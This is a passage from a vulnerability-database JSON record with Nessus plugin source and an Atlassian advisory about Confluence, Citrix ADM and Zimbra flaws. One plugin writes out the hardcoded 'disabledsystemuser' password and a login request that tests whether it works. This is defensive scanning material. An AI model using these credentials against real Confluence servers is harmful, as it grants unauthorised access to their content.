"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:71FB648030101FA9B007125DFA636193", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-17T16:33:16", "description": "The version of Atlassian Confluence installed on the remote host is prior to < 7.4.17 / 7.13.x < 7.13.6 / 7.14.x < 7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2. It is potentially affected by a hard-coded credential vulnerability if the 'Questions for Confluence' app is installed.\n\nThe Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.(CVE-2022-26138)\n\nNote that Nessus has not tested for this issue but has instead relied only on Confluence's self-reported version number. 
This plugin will only run in 'Parnoid' scans.", "cvss3": {}, "published": "2022-07-21T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 7.4.17 / 7.13.x < 7.13.6 / < 7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2 (CONFSERVER-79483)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-12-08T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-79483.NASL", "href": "https://www.tenable.com/plugins/nessus/163327", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163327);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/08\");\n\n script_cve_id(\"CVE-2022-26138\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/19\");\n\n script_name(english:\"Atlassian Confluence < 7.4.17 / 7.13.x < 7.13.6 / < 7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2 (CONFSERVER-79483)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Atlassian Confluence host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Confluence installed on the remote host is prior to < 7.4.17 / 7.13.x < 7.13.6 / 7.14.x <\n7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2. It is potentially affected by a hard-coded credential\nvulnerability if the 'Questions for Confluence' app is installed.\n\nThe Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in\nthe confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated\nattacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content\naccessible to users in the confluence-users group. 
This user account is created when installing versions 2.7.34, 2.7.35,\nand 3.0.2 of the app.(CVE-2022-26138)\n\nNote that Nessus has not tested for this issue but has instead relied only on Confluence's self-reported version\nnumber. This plugin will only run in 'Parnoid' scans.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-79483\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 7.4.17, 7.13.6, 7.14.3, 7.15.2, 7.16.4, 7.17.2, 7.13.6, 7.14.3, 7.15.2, 7.16.4,\n7.17.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26138\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\n# The vuln is in the Questions for Confluence app, not Confluence itself\n# We cannot determin if this is installed and/or the offending user account is present\nif (report_paranoia < 2) audit(AUDIT_POTENTIAL_VULN, 'Confluence', app_info.version);\n\nvar constraints = [\n { 'fixed_version' : '7.4.17', 'fixed_display' : '7.4.17 / 7.13.6 / 7.14.3 / 7.15.2 / 7.16.4 / 7.17.2' },\n { 'min_version' : '7.13.0', 'fixed_version' : '7.13.6' },\n { 'min_version' : '7.14.0', 'fixed_version' : '7.14.3' },\n { 'min_version' : '7.15.0', 'fixed_version' : '7.15.2' },\n { 'min_version' : '7.16.0', 'fixed_version' : '7.16.4' },\n { 'min_version' : '7.17.0', 'fixed_version' : '7.17.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:33:27", "description": "The remote confluence web application uses a known set of hard-coded default credentials of the 'Questions for Confluence' marketplace application. 
An attacker can exploit this to gain administrative access to the remote host.", "cvss3": {}, "published": "2022-08-12T00:00:00", "type": "nessus", "title": "Questions for Confluence App Default Credentials (CVE-2022-26138)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-12-07T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE-2022-26138.NASL", "href": "https://www.tenable.com/plugins/nessus/164091", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164091);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/07\");\n\n script_cve_id(\"CVE-2022-26138\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/19\");\n\n script_name(english:\"Questions for Confluence App Default Credentials (CVE-2022-26138)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The application hosted on the remote web server uses a default set of known credentials.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote confluence web application uses a known set of hard-coded default credentials of the\n'Questions for Confluence' marketplace application. 
An attacker can exploit this to gain \nadministrative access to the remote host.\");\n # https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?56edf34e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the application's default credentials.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26138\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('url_func.inc');\ninclude('vcf.inc');\ninclude('debug.inc');\n\nvar app_name = 'confluence';\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:app_name, port:port, webapp:true);\nvar url = build_url(port:port, qs:app_info['path']);\n\n##\n# Try to authenticate with default disabledsystemuser/disabled1system1user6708 creds\n#\n# @param port - the port the application exists on\n# @return TRUE for successful authentication, otherwise FALSE\n##\nfunction try_default_creds(port)\n{\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'[trying default creds]');\n var res, post;\n post = 'os_username=disabledsystemuser&os_password=disabled1system1user6708&login=Log+in&os_destination=%2Findex.action';\n # Authenticate\n res = http_send_recv3(\n port : port,\n method : 'POST',\n item : '/dologin.action',\n data : post,\n content_type : \"application/x-www-form-urlencoded\",\n exit_on_fail : TRUE\n );\n\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'Attempted to login with: ' + http_last_sent_request());\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'Response was: ' + obj_rep(res));\n if ('HTTP/1.1 302' >< res[0] && 'X-Seraph-LoginReason: OK' >< res[1])\n {\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'[login confirmed][ ' + res[0] + '][' + res[1] + ']');\n return TRUE;\n }\n dbg::detailed_log(lvl:1, src:FUNCTION_NAME, msg:'[login failed][ ' + res[0] + '][' + res[1] + ']');\n return FALSE;\n}\n\nvar can_auth = try_default_creds(port:port);\n\nvar report = NULL;\nif (can_auth)\n{\n report = 'Nessus was able to gain access to the remote confluence app\\n' +\n 'using the following set of credentials:\\n' +\n '\\n Username : disabledsystemuser' +\n '\\n Password : disabled1system1user6708';\n\n 
security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app_name, url);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T18:30:52", "description": "Multiple vulnerabilities exist in Citrix Application Delivery Management (ADM) 13.0 prior to 13.0-85.19 and 13.1 prior to 13.1-21.53. An unauthenticated, remote attacker can exploit this to reset the administrator password and gain administrative access to the appliance.\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-06-16T00:00:00", "type": "nessus", "title": "Citrix ADM 13.0.x < 13.0.85.19 / 13.1.x < 13.1.21.53 Multiple Vulnerabilities (CTX460016)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-27511", "CVE-2022-27512"], "modified": "2022-07-01T00:00:00", "cpe": ["cpe:/a:citrix:application_delivery_management"], "id": "CITRIX_ADM_CTX460016.NASL", "href": "https://www.tenable.com/plugins/nessus/162330", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(162330);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/01\");\n\n script_cve_id(\"CVE-2022-27511\", \"CVE-2022-27512\");\n script_xref(name:\"IAVA\", 
value:\"2022-A-0254\");\n\n script_name(english:\"Citrix ADM 13.0.x < 13.0.85.19 / 13.1.x < 13.1.21.53 Multiple Vulnerabilities (CTX460016)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Multiple vulnerabilities exist in Citrix Application Delivery Management (ADM) 13.0 prior to 13.0-85.19 and 13.1 prior\nto 13.1-21.53. An unauthenticated, remote attacker can exploit this to reset the administrator password and gain\nadministrative access to the appliance.\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported\nversion number.\");\n # https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?de07e06e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 13.0.85.19 or 13.1.21.53 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-27511\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/06/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:citrix:application_delivery_management\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"citrix_adm_ssh_detect.nbin\");\n script_require_keys(\"installed_sw/Citrix ADM\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvar app_info = vcf::get_app_info(app:'Citrix ADM');\n\nvar constraints = [\n {'min_version': '13.0', 'fixed_version': '13.0.85.19', 'fixed_display': '13.0-85.19'},\n {'min_version': '13.1', 'fixed_version': '13.1.21.53', 'fixed_display': '13.1-21.53'}\n];\n\nvcf::check_version_and_report(\n app_info: app_info,\n constraints: constraints,\n severity: SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:35:48", "description": "According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities:\nincluding the following:\n\n - An attacker can upload arbitrary files through amavisd via a cpio loophole that can lead to incorrect access to any other user accounts. (CVE-2022-41352)\n\n - Zimbra's sudo configuration permits the zimbra use to execute the zmslapd binary as root with arbitrary parameters. This includes plugins in the form of .so files specified in a user-defined configuration file. 
(CVE-2022-37393)\n\n - An information disclosure vulnerability due to an XSS in one of the attributes of an IMG element.\n (CVE-2022-41348)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-10-13T00:00:00", "type": "nessus", "title": "Zimbra Collaboration Server 9.0.0 < 9.0.0 Patch 27 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-37393", "CVE-2022-41348", "CVE-2022-41352"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:zimbra:collaboration_suite"], "id": "ZIMBRA_9_0_0_P27.NASL", "href": "https://www.tenable.com/plugins/nessus/166097", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166097);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/08\");\n\n script_cve_id(\"CVE-2022-37393\", \"CVE-2022-41348\", \"CVE-2022-41352\");\n script_xref(name:\"IAVA\", value:\"2022-A-0419-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/10\");\n\n script_name(english:\"Zimbra Collaboration Server 9.0.0 < 9.0.0 Patch 27 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities:\nincluding the following:\n\n - An attacker can upload arbitrary files through amavisd via a cpio loophole that can lead to\n incorrect access to any other user accounts. (CVE-2022-41352)\n\n - Zimbra's sudo configuration permits the zimbra use to execute the zmslapd binary as root with\n arbitrary parameters. 
This includes plugins in the form of .so files specified in a user-defined\n configuration file. (CVE-2022-37393)\n\n - An information disclosure vulnerability due to an XSS in one of the attributes of an IMG element.\n (CVE-2022-41348)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P27\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Security_Center\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 9.0.0 Patch 27, or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zimbra zmslapd arbitrary module load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:zimbra:collaboration_suite\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"zimbra_web_detect.nbin\", \"zimbra_nix_installed.nbin\");\n script_require_keys(\"installed_sw/zimbra_zcs\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::zimbra::combined_get_app_info();\n\nvar constraints = [\n {'min_version':'9.0', 'max_version':'9.0.0', 'fixed_display':'9.0.0 Patch 27', 'Patch':'27'}\n];\n\nvcf::zimbra::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xss':TRUE}\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:35:14", "description": "According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities:\nincluding the following:\n\n - An attacker can upload arbitrary files through amavisd via a cpio loophole that can lead to incorrect access to any other user accounts. (CVE-2022-41352)\n\n - Zimbra's sudo configuration permits the zimbra use to execute the zmslapd binary as root with arbitrary parameters. This includes plugins in the form of .so files specified in a user-defined configuration file. (CVE-2022-37393)\n\n - An information disclosure vulnerability due to an XSS attributes in the clsearch, compose and calendar components of webmail. (CVE-2022-41349. 
CVE-2022-41350, CVE-2022-41351)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-10-13T00:00:00", "type": "nessus", "title": "Zimbra Collaboration Server 8.8.15 < 8.8.15 Patch 34 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-37393", "CVE-2022-41349", "CVE-2022-41350", "CVE-2022-41351", "CVE-2022-41352"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:zimbra:collaboration_suite"], "id": "ZIMBRA_8_8_15_P34.NASL", "href": "https://www.tenable.com/plugins/nessus/166098", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166098);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/08\");\n\n script_cve_id(\n \"CVE-2022-37393\",\n \"CVE-2022-41349\",\n \"CVE-2022-41350\",\n \"CVE-2022-41351\",\n \"CVE-2022-41352\"\n );\n script_xref(name:\"IAVA\", value:\"2022-A-0419-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/10\");\n\n script_name(english:\"Zimbra Collaboration Server 8.8.15 < 8.8.15 Patch 34 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, Zimbra Collaboration Server is affected by a multiple vulnerabilities:\nincluding the following:\n\n - An attacker can upload arbitrary files through amavisd via a cpio loophole that can lead to\n incorrect access to any other user accounts. (CVE-2022-41352)\n\n - Zimbra's sudo configuration permits the zimbra use to execute the zmslapd binary as root with\n arbitrary parameters. This includes plugins in the form of .so files specified in a user-defined\n configuration file. 
(CVE-2022-37393)\n\n - An information disclosure vulnerability due to an XSS attributes in the clsearch, compose and calendar\n components of webmail. (CVE-2022-41349. CVE-2022-41350, CVE-2022-41351)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P34\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Security_Center\");\n script_set_attribute(attribute:\"see_also\", value:\"https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.8.15 Patch 34, or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-41352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Zimbra zmslapd arbitrary module load');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:zimbra:collaboration_suite\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"zimbra_web_detect.nbin\", \"zimbra_nix_installed.nbin\");\n script_require_keys(\"installed_sw/zimbra_zcs\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::zimbra::combined_get_app_info();\n\nvar constraints = [\n {'min_version':'8.8.15', 'max_version':'8.8.15', 'fixed_display':'8.8.15 Patch 34', 'Patch':'34'}\n];\n\nvcf::zimbra::check_version_and_report(\n app_info:app_info,\n constraints:constraints,\n severity:SECURITY_HOLE,\n flags:{'xss':TRUE}\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "atlassian": [{"lastseen": "2023-06-06T15:36:37", "description": "(i) *Update:* This advisory has been updated since its original publication.\r\n\r\n2022/08/01 12:00 PM PDT (Pacific Time, -7 hours)\r\n * {color:#172b4d}Updated the\u00a0_Remediation_ section to note that if the {{disabledsystemuser}} account is manually deleted, the app must also be updated or uninstalled to ensure the account does not get recreated{color}\r\n\r\n2022/08/01 11:00 AM PDT (Pacific Time, -7 hours)\r\n * Updated the\u00a0_Summary of Vulnerability_ section to note the email service provider for the {{dontdeletethisuser@email.com}}\u00a0account has confirmed the account has been blocked\u00a0\r\n\r\n2022/07/30 1:15 PM PDT (Pacific Time, -7 hours)\r\n * Updated the\u00a0_Summary of Vulnerability_ section to note that instances that have not remediated this vulnerability per the\u00a0_Remediation_ section below may send email notifications from Confluence to a third party email address\r\n * Additional details are available in [Confluence Security Advisory 
2022-07-20|https://confluence.atlassian.com/doc/confluence-security-advisory-2022-07-20-1142446709.html]\r\n\r\n2022/07/22 9:30 AM PDT (Pacific Time, -7 hours)\r\n * Updated the\u00a0_Remediation_ section to explain only option 2 can be used for Confluence Server and Data Center instances configured to use a read-only external directory\r\n * Added a link to a page of frequently asked questions about CVE-2022-26138\r\n\r\n2022/07/21 8:30 AM PDT (Pacific Time, -7 hours)\r\n * An external party has discovered and publicly disclosed the hardcoded password on Twitter. *It is important to remediate this vulnerability on affected systems immediately.*\r\n * The Vulnerability Summary section has been updated to include this new information\r\n\r\nh3. Vulnerability Summary\r\n\r\nWhen the [Questions for Confluence app|https://marketplace.atlassian.com/apps/1211644/questions-for-confluence?hosting=server&tab=overview] is enabled on Confluence Server or Data Center, it creates a Confluence user account with the username {{{}disabledsystemuser{}}}. This account is intended to aid administrators that are migrating data from the app to Confluence Cloud. The {{disabledsystemuser}} account is created with a hardcoded password and is added to the {{confluence-users}} group, which allows viewing and editing all non-restricted pages within Confluence [by default|https://confluence.atlassian.com/doc/confluence-groups-139478.html]. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence.\r\n\r\nThe {{disabledsystemuser}} account is configured with a third party email address ({{{}dontdeletethisuser@email.com{}}}) that is not controlled by Atlassian. 
If this vulnerability has not been remediated per the _Fixes_\u00a0section below, an affected instance\u00a0configured\u00a0to send\u00a0[notifications|https://confluence.atlassian.com/doc/email-notifications-145162.html]\u00a0will email that address.\u00a0One example\u00a0of an email notification is\u00a0[Recommended Updates Notifications|https://confluence.atlassian.com/doc/configuring-the-recommended-updates-email-notification-281480712.html], which contains a report of the top pages from Confluence spaces the user has permissions to view. mail.com, the free email provider that manages the {{dontdeletethisuser@email.com}}\u00a0account, has confirmed to Atlassian that the account has been blocked. This means it cannot be accessed by anyone unauthorized and cannot send or receive any new messages.\r\n\r\n(!) An external party has discovered and publicly disclosed the hardcoded password on Twitter. Refer to the _Remediation_ section below for guidance on how to remediate this vulnerability.\r\nh3. How To Determine If You Are Affected\r\n\r\nA Confluence Server or Data Center instance is affected if it has an active user account with the following information:\r\n * User: {{disabledsystemuser}}\r\n * Username: {{disabledsystemuser}}\r\n * Email: {{dontdeletethisuser@email.com}}\r\n\r\nIf this account does not show up in the list of active users, the Confluence instance is not affected.\r\nh3. Remediation\r\n\r\n(!) Uninstalling the Questions for Confluence app does *not* remediate this vulnerability. The {{disabledsystemuser}} account does not automatically get removed after the app has been uninstalled. If you have verified a Confluence Server or Data Center instance is affected, two equally effective ways to remediate this vulnerability are listed below. (!)\r\nh4. 
Option 1: Update to a non-vulnerable version of Questions for Confluence\r\n\r\nUpdate the Questions for Confluence app to a fixed version:\r\n * 2.7.x >= 2.7.38\r\n * Versions >= 3.0.5\r\n\r\nFor more information on how to update an app, refer to [Atlassian's documentation|https://confluence.atlassian.com/upm/updating-apps-273875710.html].\r\n\r\nFixed versions of the Questions for Confluence app stop creating the {{disabledsystemuser}} user account, and remove it from the system if it has already been created. Migrating data from the app to Confluence Cloud is now a manual process.\r\n\r\n(!) If Confluence is configured to use a read-only external directory (e.g. Atlassian Crowd), you will need to follow Option 2 below.\r\nh4. Option 2: Disable or delete the {{disabledsystemuser}} account\r\n\r\nSearch for the {{disabledsystemuser}} account and either disable it or delete it. For instructions on how to disable or delete an account (including an explanation of the differences between the two options), refer to [Atlassian's 